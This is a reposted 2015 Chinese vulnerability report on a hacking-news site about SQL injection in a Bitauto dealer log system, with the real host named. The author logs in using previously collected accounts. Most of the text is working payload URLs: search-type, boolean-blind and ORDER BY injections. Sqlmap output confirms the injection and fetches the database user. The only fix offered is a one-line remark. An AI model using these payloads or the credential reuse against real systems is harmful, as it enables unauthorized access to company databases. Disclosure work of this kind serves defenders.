记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

易车某系统多处注入打包

2015-05-15 07:41

发现最近好多人提交易车的洞,凑个热闹

问题站点:

http://log.yiqi.autodmp.cig.com.cn/

利用以前收集的账号进去看看,发现一堆注入点:



1、搜索型注入:

http://log.yiqi.autodmp.cig.com.cn/dealers/get_list_bypager?m_pageindex=1&m_pagesize=10&m_provinceid=330000%09%09%09%09%09%09%09%' and '%'='&m_areaid=&m_area2id=&m_keyword=%E4%B8%9C%E9%98%B3%'+and+'%'='&1427551508291



2、布尔盲注:

http://log.yiqi.autodmp.cig.com.cn/lms_api/stat/get_stat_product_list?start_time=20150228%20and%201=1&end_time=20150328 and 1=1&page_size=0&graph_type=table&1427551564107



全站的start_time和end_time都存在注入



3、order by注入:

http://log.yiqi.autodmp.cig.com.cn/lms_api/clue/get_clue_list_bypaper?starttime=1425132344&endtime=1427551544&page_index=1&page_size=20&approach=&channel=&carmodel=&meida=&province=&city=&district=&dealer=&cartype=&state=&activity=&keyword=&sortfield=post_time&sort=desc>ype=1&verify_status=&1427551576702



sortfield=post_time&sort=desc 这两个参数都可以orderby 注入,比如sort=desc,if(1=1,1,(select 1 union select 2))



应该还有很多其他注入点,不一一列举了,自查吧


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Parameter: m_keyword (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: m_pageindex=1&m_pagesize=10&m_provinceid=330000&m_areaid=&m_area2id=&m_keyword=%E4%B8%9C%E9%98%B3%%' AND 2230=2230 AND '%'='&1427551508291

---

[22:14:33] [INFO] testing MySQL

[22:14:33] [INFO] confirming MySQL

[22:14:33] [INFO] the back-end DBMS is MySQL

web application technology: Apache, PHP 5.3.9

back-end DBMS: MySQL >= 5.0.0

[22:14:33] [INFO] fetching current user

[22:14:33] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval

[22:14:33] [INFO] retrieved: autodmp_dealer@%

current user: 'autodmp_dealer@%'

解决方案:

后台系统也要做好安全防护,不然就是一个内网突破口~

知识来源: www.2cto.com/Article/201505/399302.html

阅读:95132 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“易车某系统多处注入打包”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云